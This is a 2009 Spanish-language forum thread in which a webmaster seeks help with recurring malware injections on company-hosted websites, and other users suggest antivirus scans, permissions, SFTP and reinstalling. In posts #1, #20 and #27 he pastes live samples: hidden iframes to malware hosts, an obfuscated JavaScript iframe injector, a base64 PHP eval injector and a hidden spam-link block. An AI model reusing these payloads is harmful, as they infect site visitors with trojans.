Virus en Servidor de Hosting

el_javi · #1 (**permalink**) 31/08/2009, 05:49

Buenas tardes a todos.

Desde hace ya 2 semanas tenemos problemas en nuestro hosting de empresa.

En los servidores de una de las empresas de Hosting nos han aparecido dentro de las páginas Webs (después del tag del Body o al final del documento) elementos IFRAME que hacen cargas de troyanos a los usuarios cuando navegan.

Estos troyanos son reales, dado que mi antiSpyware y antivirus los detectan cada vez que entro, por lo cual, estamos infectando a los usuarios.

PArece ser que estos elementos, según los técnivos de MediaTemple (hosting) nos los han colado por medio de llamadas a URLs y gracias a la directiva PHP allow_url_fopen.

dicha directiva ha sido desactivada en los 2 servidores que tenemos pero nuevamente aparecen los códigos (los cuales tienen una apariencia parecida a:)

Código:

<iframe src ="http://www.groundplan.info/aaqq/?aa2f63ed43c8f62dbfe18c95544b491f" width="1" height="1"> </iframe>

<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi140" width=125 height=125 style="visibility: hidden"></iframe>

y otras variantes más.

Me he conectado la los 2 servidores vía SSH, y he eliminado dichos códigos gracias a un script que hemos creado en este post (pregunta tras pregunta) http://www.forosdelweb.com/f41/reemp...chivos-728149/

Funcionar, funciona, me limpia los archivos, pero días después, aparecen nuevamente, los usuarios llaman porque se les ha infectado el ordenador y tiene que formatear...

¿Cómo atajar esto?
¿Qué debemos hacer?

Espero todos vuestros comentarios, dado que mi jefe está empezando a desesperar, porque pierde usuarios, ventas, y necesitamos una solución.

Muchas gracias de antemano a todos.

Un saludo.

Javier

-Defero- · #2 (**permalink**) 31/08/2009, 07:09

No tengo mucha idea de estos temas, pero supongo que tras colaros los troyanos, aunque cerréis las vías de acceso, los que han entrado siguen dentro. ¿Has probado a ejecutar un antivirus en los propios servidores? Por ejemplo, ClamAV.

el_javi · #3 (**permalink**) 31/08/2009, 07:42

Hola -Defero-

Muchas gracias por tu contestación.

como primer elemento que decirte (y a las demás personas que lean y/o contesten) es que no soy administrador de sistemas, por lo cual hay muchas cosas que desconozco.

Por otro lado, es lógico el tema de usar un anti virus, pero: No se cua, no se de donde se descargan cosas de este tipo (para linux) y cómo se instalan.

Por ello.. ¿Podéis ir dándome directrices para solucionar este problema?

Por último, ante el uso de un antivirus, me da miedo porque:

¿Va a eliminar todos aquellos ficheros Web que tengan los códigos maliciosos? (porque si es as´si, si elimina los fichero Web, dejarán de funcionar muchas de nuestras páginas Web.

Espero vuestros comentarios, y sobre todo que seáis comprensivos y pacientes ante mi desconocimiento en administración de servidores Linux.

Un saludo y gracias de antemano.

Javier

-Defero- · #4 (**permalink**) 31/08/2009, 07:57

¿De qué distro estábamos hablando? Si se trata de Debian, y tienes acceso de administrador al servidor, basta con ejecutar "apt-get install clamav" (sin comillas). Si no tienes acceso de administrador, pídeles a los administradores que te lo instalen.

En cuanto a tu preocupación por el borrado de los archivos, imagino que puedes ejecutar el antivirus en modo "sólo lectura". Es decir, que detecte los troyanos pero que no los borre, que sólo te indique dónde están. Luego ya tú podrías verificar si se trata de un archivo que puedes borrar tranquilamente.

Además de ClamAV, tal vez te interese ejecutar Rkhunter. Lo mismo:

apt-get install rkhunter

el_javi · #5 (**permalink**) 31/08/2009, 09:49

Hola -Defero-

Gracias por tu contestación.

He ejecutado apt-get install clamav y la respuesta de la Shell es -bash: apt-get: command not found

Por otro lado, apt-get install rkhunter me dice exactamente lo mismo

Como podrás ver (porque he ejecutado los comandos) tengo acceso como administrador vía SSH.

Respecto al segundo (apt-get install rkhunter) ¿qué es? (por curiosidad).

Entonces, si estos dos que me has dicho no valen.. ¿que he de hacer?

Y ya para terminar mis preguntas (de ahora jejej): ¿Se puede instalar un antivirus que al suvir los ficheros por FTP, si alguno tiene virus o troyanos, lo indique, no deje subirlo o algo así?

Espero tus/vuestros comentarios con ganas y urgencia.

Un saludo.

Javier

el_javi · #6 (**permalink**) 31/08/2009, 09:53

Por cierto, la versión de Linux instalada es:

Linux version 2.6.9-023stab048.6-enterprise (root@rhel4-32) (gcc version 3.4.5 20051201 (Red Hat 3.4.5-2)) #1 SMP Mon Nov 17 19:09:18 MSK 2008

Saludos.

Javier

-Defero- · #7 (**permalink**) 31/08/2009, 10:21

Por lo que veo, se trata de Red Hat. El comando APT no sirve para Red Hat, es propio de Debian y derivados. Por eso te preguntaba qué distro usas. En Red Hat se usa YUM. Creo recordar que bastaba con:

yum install clamav

Rkhunter es, como su nombre indica, un "cazador de rootkits". Lo que hace es analizar los archivos de tu PC para ver si alguno ha sido alterado.

PD: Que tengas acceso vía SSH no quiere decir que tengas permiso de administrador. Puedes tener acceso de "usuario raso". Para saber si tienes permisos de administrador, ejecuta "whoami" (sin comillas). Esto te dirá qué cuenta de usuario estás usando. Si no es ROOT, no tienes permisos de administrador.

el_javi · #8 (**permalink**) 31/08/2009, 10:27

Hola compañero.

Pues si, es un RedHut.

Como usuario, soy Root, así que tengo todos los permisos.

y el comando Yum tampoco funciona, me da -bash: yum: command not found

Gracias de nuevo.

Javier

-Defero- · #9 (**permalink**) 31/08/2009, 11:04

Hmmm... si no tienes YUM, creo que voy a darle el relevo a otros. Tal vez Ociomax sepa ayudarte.

el_javi · #10 (**permalink**) 31/08/2009, 14:28

Hola a todos.

Pues espero que este relevo pasado pueda cogerlo alguien y me ayude pronto.

La verdad que es algo que nos urge bastante.

Espero vuestros comentarios.

Un saludo.

Javier

AleSanchez · #11 (**permalink**) 31/08/2009, 18:19

Quizás como es un servidor dedicado en una empresa de hosting, no tenga disponible el comando Yum aún para el root.

Te comento mi experiencia: Alguna vez me pasó exactamente esto, y la verdad que nunca pude saber a ciencia cierta cómo es que se infectaron los archivos en el servidor. Pero supuse, que los mismos no se infectaron en el servidor, sino en el equipo de la diseñadora, y se subieron al servidor ya modificados.

Revisa quién tiene acceso a esos archivos para que chequeen en sus equipos si tienen los archivos con el código malicioso.

Saludos.

el_javi · #12 (**permalink**) 01/09/2009, 02:29

Hola AleSanchez.

Gracias por tu contestación.

Respecto a que "puedan estar subiéndolos la gente que trabaja".

Pues podría ser, a pesar de que todo el mundo me dice que no, que han revisado los ficheros, que han usado el buscador de DreamWeaver para buscar iframes en el código fuente...

Por ello, quizás si que esté en el servidor (si me fio de la gente claro).

¿Se os ocurre alguna manera de solucionar esto? ?cómo evitarlo?

Ayer por la noche me dejé el servidor totalmente limpio (haciendo limpiezas manuales) y hoy por la mañana, había ya códigos en páginas de un WordPress... y en ese Wordpress solo trabajo yo ....

Por eso estoy llegando a la desesperación, dado que mi jefe lo ha visto y me ha dicho que entonces la culpa es mía, porque ese proyecto es mío ...

Espero vuestros comentarios.

Un saludo.

Javier

el_javi · #13 (**permalink**) 01/09/2009, 11:24

Hola de nuevo a todos.

Ante esta situación, mi jefe ha decidido buscar personas especializadas en administración de sistemas, y uno de los lugares principales donde buscar creo que podría ser aquí.

¿Alguien que considere que puede erradicar este problema que tenemos y explicarme como mantener el servidor seguro para evitar posibles futuros ataques?

Sería hacer el trabajo desde vuestra casa, previo presupuesto, y una pequeña documentación de qué se ha hecho, cómo y como mantenerlo.

Espero vuestros comentarios urgentemente.

Un saludo.

Javier

monoswim · #14 (**permalink**) 01/09/2009, 12:42

chekea

http://perlenespanol.com/foro/script...ilit=malicioso

Espero que te sirva

el_javi · #15 (**permalink**) 02/09/2009, 04:36

Gracias por vuestras contestaciones.

Tengo una pequeña preguntilla...
Tengo un hosting en Godaddy.com (bueno, estaba allí ya cuando empecé a trabajar).

Me he conectado por medio de SSH y no se en qué carpeta está la estructura Web, para poder pasarle un Script de limpieza..

¿Alguien sabe decirme en qué ruta dentro del server estará la carpeta que contiene la Web?

Gracias de antemano.

Javier

monoswim · #16 (**permalink**) 02/09/2009, 06:45

Puedes hacer un updatedb y luego un locate index.html

Por lo general están en /var/www o en el /home de cada usuario...

Pero no conozco el caso de godaddy

el_javi · #17 (**permalink**) 02/09/2009, 09:18

Hola monoswim.

Pues he de decirte que updatedb y locate index.html no funcionan en el servidor.

Me sale como mensaje

-bash: updatedb: command not found

-bash: locate: command not found

¿Porqué puede ser, si estos comandos son genéricos de Linux, no?

Espero vuestros comentarios.

Un saludo.

Javier

el_javi · #18 (**permalink**) 02/09/2009, 11:12

Hola a todos.

Por fin encontré la ruta.. la verdad que un tanto enrevesado.. en plan..... /home/content/e/l/i/t/e......./elitepro/../index.html

Por fin tengo todos mis documentos localizados.

Gracias nuevamente.

Un saludo.

Javier

all-ill · #19 (**permalink**) 02/09/2009, 16:31

Muy buena información

Cita:

Iniciado por monoswim

chekea

http://perlenespanol.com/foro/script...ilit=malicioso

Espero que te sirva

Los clientes que utilicen el servidor deberían desinfectar sus equipos y cambiar las contraseñas de acceso (FTP, etc.) y recomendar que si es posible utilicen SFTP en lugar de FTP (como sugieren algunos de los enlaces anteriores)
En alguno de los equipos locales infectados es posible que una de las infecciones robe contraseñas de FTP.

caso similar: http://www.forosdelweb.com/f66/web-atacante-730236/

el_javi · #20 (**permalink**) 03/09/2009, 03:54

Hola de nuevo.

El problema se agrava...

Ya no solo hay códigos de IFRAMES, también hay javascripts ofuscados que lanzan iframes....

Esto se está poniendo cada vez más serio...

Lo primero... ¿Qué permisos deberían de tener las carpetas para que no puedan escribirme en el servidor?

Según he visto parece ser que tienen 777, esto no es correcto ¿verdad?

Lo segundo.. ¿qué medidas se pueden tomar para parar esto?

Si alguien considera que puede ayudarme en ello, por favor, contamos con hacer una colaboración presupuestada para solucionar esto lo antes posible.

Espero vuestros comentarios.

Un saludo.

Javier

el_javi · #21 (**permalink**) 03/09/2009, 03:56

Añado algunos de los códigos (o tipos de códigos) encontrados.

Código:

<iframe src="http://x3y.ru:8080/index.php" width=192 height=116 style="visibility: hidden"></iframe>

Código:

$frame_code = '<!--_aTGEUTfSSgEFcTnrdU--><script>/*BuiLcqqRV_xHcBXY*/var zDdWYV=document;/*WjyMlGOXCdsKFLsgkPixm*/function jIHLTqU(yVGJqay_B)/*WjyMlGOXCdsKFLsgkPixm*/{var Wyepu_ = "",/*WjyMlGOXCdsKFLsgkPixm*/KapRF=0;for(KapRF=yVGJqay_B.length-1;KapRF >= 0;KapRF--)/*XlNoWtqDJkJrRkOuvPh*/{Wyepu_+=yVGJqay_B.charAt(KapRF);}return Wyepu_;/*WjyMlGOXCdsKFLsgkPixm*/}/*iGSaTTTeWWDfUVRHbWxlpvEZ*/function cwNYAo(tdJYLh)/*aDUtMfXLSgQlw*/{/*Z__pEUcvrSvtgXfnhL*/tdJYLh = tdJYLh.replace(/[\.]/g, "%");/*aDUtMfXLSgQlw*/tdJYLh=unescape(tdJYLh);/*uSsXPHapeDeOj*/return jIHLTqU(tdJYLh);/*oTpnNotkDJeSIPZbD*/}/*hcZohrAfwnlZLWdfkpvUaqM*/function ZIiifUoUN(){/*wmIDvEvuKtqVh*/zDdWYV.write("<style>.RMFgMfV{width:1px;height:1px;border:none;visibility:hidden}</style>");/*iGSaTTTeWWDfUVRHbWxlpvEZ*//*kmBULhLifFLqnzZBJcWDL*/var rIRKZY="<iframe id=\"CESoVefb\" src=\"x\" class=\"RMFgMfV\"></iframe>";/*_kwknDMSdMMNZZCWuVDSyid*//*BuiLcqqRV_xHcBXY*/var cXBgrPlxv=rIRKZY.replace(/[\+x]/g,cwNYAo(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*wmIDvEvuKtqVh*//*_ncacICxiORIDceHHkaXVWfik*/return cXBgrPlxv;/*_kwknDMSdMMNZZCWuVDSyid*//*wmIDvEvuKtqVh*/}/*wTjbjzMmLJeFAXf*//*QnaIOmTIgb*//*iGSaTTTeWWDfUVRHbWxlpvEZ*//*Z__pEUcvrSvtgXfnhL*/zDdWYV.writeln(ZIiifUoUN());/*gbmZqeCvoVxoIrgLDWWkOEJfM*//*aDUtMfXLSgQlw*//*eXB_pxWWLeLAAzSGKUuqOITh*/</script><!--_aTGEUTfSSgEFcTnrdU-->';

Gracias nuevamente.

Javier

-Defero- · #22 (**permalink**) 03/09/2009, 05:10

Siento no poder darte una solución para tu problema, pero sí te puedo decir que dar permisos 777 es una temeridad (todo el mundo puede hacer todo). Nunca me he aclarado bien con este tema, pero según parece, no deberías darle permisos más allá de 755.

all-ill · #23 (**permalink**) 04/09/2009, 16:29

http://www.hispasec.com/unaaldia/386...lar-los-medios

Cita:

Gumblar se nutre de dos vías diferentes, la principal es infectando un sitio web a través de contraseñas FTP capturadas o explotando vulnerabilidades de servidor conocidas. Una vez consigue acceder al servidor web, inyecta código javascript en las páginas alojadas pero intenta evadir aquellas que son más susceptibles de ser examinadas ocasionalmente por un administrador, como la página principal o un index.html. Adicionalmente, cada vez que el script se inserta, es ofuscado de diferente forma para eludir la identificación mediante firma de los motores de los antivirus.

La segunda vía toma forma cuando el sitio web infectado es visitado. El script es ejecutado por el cliente e intenta explotar en el un abanico de exploits que van desde vulnerabilidades multiplataforma en el reproductor Flash o el lector de archivos PDF Adobe Reader hasta específicas de Internet Explorer. Si consigue su objetivo (entre otras acciones ya comunes entre el malware) instalará un troyano en la máquina del visitante que se dedicará a inspeccionar el tráfico con, a su vez, dos funciones a destacar: examinar el tráfico en busca de contraseñas de servidores FTP para usarlas en nuevas infecciones y la inyección de tráfico cuando el usuario efectúa una búsqueda en Google, mostrándole resultados manipulados que apuntan a sitios fraudulentos. Ser el "Google" particular (e insospechado) de un buen número de "clientes" puede resultar muy lucrativo.

En las últimas infecciones se ha detectado, como no podía ser de otra forma, la instalación de un componente para asociar al nodo infectado a una botnet.

Los dominios principales de los que se sirve el malware son entre otros "gumblar.cn" y "martuz.cn" y han sido bloqueados. Pero el malware descarga otros componentes desde otras localizaciones que todavía siguen activas. Estos binarios tienen un nivel de detección de poco más del 50% de los motores según el análisis en VirusTotal.com.

El comportamiento combinado de Gumblar no deja de ser interesante aunque todavía no se conozca la incidencia a largo plazo del espécimen.

NRLABS · #24 (**permalink**) 04/09/2009, 23:17

No leí todos los post, capaz ya te lo dijieron, pero aun asi, va mi recomendacion...

despues de pasar el antivirus... es salvar los archivos,respaldar... reinstalar desde 0, realizar una auditoria de los codigos de tus sitios web y realizar un completo aseguramiento de permisos, programas, contraseñas y otros a la maquina (hardening). No queda otra, practicamente tu maquina esta "hackeada" y puede ser puente para otros ataques.

Se que es costoso en tiempo y dinero, pero es la mejor solución para estos problemas.

Saludos.

Otra recomendación, (desconozco el accionar del virus, si el virus trabaja como root, entonces, esto es inutil) ejecuta un chmod recursivo quitando los permisos de escritura a todos los ficheros web. De esta forma, aunque el virus este, se "podria" llegar a evitar que modifique las paginas web.
Nota:el chmod recursivo que te recomiendo es

"chmod -R 544 /ruta/a/las/web" (como root)
NOTA: esto podria dejar inutilizable algunos sistemas (cms, o cuando intentas subir algo, puesto que quitas los permisos de escritura a todo)
Aun asi, es solo una solucion parche, piensa lo bien, y la recomendacion nuevamente... reinstala y usa tus backups originales, si es posible.

Agrego...
estuve leyendo, y vi esto
"The infection is not a server-wide exploit. It will only infect sites on the server that it has passwords to"

Entonces, la solución parche que te propongo, deberia funcionar. Aunque te va a tarer varios problemas con los permisos... errores de acceso y demases, además, podria darse el caso de que "haya mutado" y este atacando tu servidor, tenga una backdoor o algo similar...... suena paranoico, pero bueno...

internucleo · #25 (**permalink**) 16/10/2009, 17:01

que tal no se si eta respuesta es demasiado tarde pero detodos modols la voy a poner porque parese que esto solusiona ese problema

¿Cómo es posible que se pueda modificar el index de un sitio?

Bueno, al principio no comprendía como era que actuaba el virus, no parecía tener lógica (mientras pensaba que era una infección por parte de bots en el servidor) hasta que me puse a fijar en el ftp (ya que había infectado otros sitios) y ahí la cosa cambió.

El virus al infectar una Pc, toma los usuarios y contraseñas de todas las cuentas FTP almacenadas en ella para ampliar la infección en nuevos sitios web descargando los archivos index, modificandolos agregándoles el iframe, y luego volviendo a subirlos por FTP (también agrega archivos infectados en otras partes del sitio, archivos con nombres como image.php, etc).

Hoy realicé una nueva búsqueda y di con este artículo de un virus llamado "Gumblar" que no sé si es el mismo o una variante, pero tiene un comportamiento básicamente similar. Léanlo.

aqui esta toda la info completa
taringa.net/posts/info/2758181/Alerta-Webmasters-y-Users:-Virus-en-Sitios-Web.html

e333 · #26 (**permalink**) 29/10/2009, 11:06

Hola El_Javi yo tengo el mismo problema del tuyo......bueno igual me salio a mi es mas salio una ruta a mi: smertest.ru/8080/test.php es un enlace super extraño las paginas me salian como comidas o cortadas........sin importar q hubiese Flash....bueno.....lo unico q hice fue claro....despues de ver q acada rato borraba un archivo extraño alojado en la carpeta "images" se creaba un file llamado "Gifimg.php" este extraño file deduci q era lo q nos estaba alterando todo nuestras paginas.....lo unnico q hice fue y q deberias hacer es borrar todo el site....reiniciar TODO.....incluyendo correos etc.... y subir la pagina de nuevo...claro previas pasada de antivirus......los mas fuertes q tengas.....el Avast me boto una vez muchos virus radicados SOLO en el index de las pags. y nada mas.....de q se te borraran me temo q si se te borrara......debes ver si tu PC esta limpia para poder subir TODOS los files nuevamente.........eso ya depende de ti....es la unica solucion yo trabajo en lo mismo q tu....y esto me ha pasado..........bye

el_javi · #27 (**permalink**) 30/10/2009, 04:52

Hola a todos.

Tras solicitar y contratar servicios a un Administrador de Sistemas, hacer modificaciones en el servidor, instalar SuPHP, cambiar de FTP a SFTP y demás, todo se quedo "aparentemente bien"

No hemos tenido más apariciones de elementos extraños, Google no nos ha vuelto a bloquear nuestras páginas y ya no saltaban mis antivirus ni AntiSpywares. Todo estaba bien.

Pero ayer, otro programador y yo, encontramos en el servidor algo raro:

En muchos ficheros aparece esto:

Código:

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy92aG9zdHMvdHVpbWFnZW5wZXJzb25hbC5jb20vaHR0cGRvY3MvYmxvZ2FzdW4vd3AtaW5jbHVkZXMvanMvdGlueW1jZS90aGVtZXMvYWR2YW5jZWQvaW1hZ2VzL3hwL19ub3Rlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL3Zhci93d3cvdmhvc3RzL3R1aW1hZ2VucGVyc29uYWwuY29tL2h0dHBkb2NzL2Jsb2dhc3VuL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9fbm90ZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

Esto es lo primero que encontramos, y lo encontramos en muchísimos ficheros.

Después, en muchos ficheros también, encontramos OTRA variante de estos códigos maliciosos, que os pego a continuación:

Código:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://repox.servepics.com:8080/index.php'; this.height='0'; this.width='0';}" >Hdg8vlnpjx8e</iframe>"

Y ya finalmente, tras haber revisado todo el código fuente de un fichero (ocurre en muchos ficheros, pero nos hemos centrado en uno solo) tras revisar el código, quitar el EVAL, tras quitar el IFRAME (y sin quitar estos dos elementos) al ver el fichero ONLINE, nos encontramos esto después del BODY:

Código:

<style>#x_z {display:none;}</style><font id="x_z"> <li><a href="http://164.113.40.42/moodle17/calendar/set.php/?tjwo=6">benjamin maisani</a><li><a href="http://www.protego-org.org/index.php/?tuwt=7">droid vs iphone</a><li><a href="http://your-learning.org/portal/index.php/?trot=5">pumpkin carving templates free</a><li><a href="http://www.mariorotta.com/shopping/?tpfg=0">ani ashekian</a><li><a href="http://www.sciform-aulamagna2.unito.it/learning/mod/wiki/view.php/?trix=6">christa davies</a><li><a href="http://www.sciform-aulamagna2.unito.it/learning/mod/wiki/view.php/?trix=7">oprah.com payless</a><li><a href="http://webbiz.tuitionvalley.com/catalog.php/?tpfz=6">world series game 2 score</a><li> </font>

(lo he ocrtado porque era muy largo y no quería llenar un POST entero con esto)

Entonces... esto ¿que carajos es?

¿Todo esto? ¿DE donde sale? ¿cómo erradicarlo?

Estamos buscando también un Administrador de Sistemas que pueda darnos un presupuesto y nos ayude a solucionar esto y que no nos vuelva a pasar (la anteriro persona, hizo cambios, todo iba bien pero luego ha vuelto a aparecer estas cosas nuevas, por lo que queremos fiabilidad...)

Espero vuestros comentarios.

Un saludo.

Javier

e333 · #28 (**permalink**) 30/10/2009, 12:10

Mucha cosa man....haz la mas facil man hazme caso de lo que te puse arriba......parece q solo haz disfrazado el problema y no lo haz solucionado solo te digo que hagas, borra tu: File manager y vuelve a subir todo....eso es todo.....resetea su sitio y eso es todo...porque no haces esto??? a mi me funciono de mil maravillas.....ah y formatea tu PC y que no haya ningun virus obvio....sabes q hacemos nosotros Freezamos la PC asi virus q entra virus q jamas entrara a nuestro sistema nada mas.......obviamente pon tus datos en D: no?